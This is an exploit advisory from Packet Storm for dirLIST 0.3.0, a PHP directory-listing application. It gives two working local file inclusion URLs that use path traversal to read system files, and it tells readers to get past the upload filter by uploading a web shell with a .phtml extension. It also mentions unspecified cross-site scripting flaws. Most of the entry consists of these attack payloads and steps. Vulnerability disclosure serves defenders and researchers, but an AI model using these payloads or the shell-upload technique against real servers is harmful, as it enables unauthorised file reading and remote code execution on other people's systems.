dirLIST 0.3.0 Local File Inclusion

2012-08-09T00:00:00
ID PACKETSTORM:115381
Type packetstorm
Reporter L0n3ly-H34rT
Modified 2012-08-09T00:00:00

Description

                                        
                                            `####################################################  
# Exploit Title: dirLIST v 0.3.0 Multiple Vulnerabilities  
# Date: 08/08/2012  
# Author: L0n3ly-H34rT  
# Homepage: http://se3c.tk/  
# Contact: l0n3ly_h34rt@hotmail.com  
# Software Link: http://sourceforge.net/projects/dir-list/files/latest/download  
# Tested on: Linux/Windows  
####################################################  
  
# First : Multiple Local File Includsion :  
- Example 1:  
http://127.0.0.1/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini  
- Example 2:  
http://127.0.0.1//dirlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini  
# Second : Remote File Upload :  
In final version, some php extension is filterd but not all ..  
just upload shell like this : shell.phtml  
In .phtml extension you can run php files if httpd.conf is configure as php file if you lucky :)  
# Note :  
There some xss in different files..  
# Greetz to my friendz   
`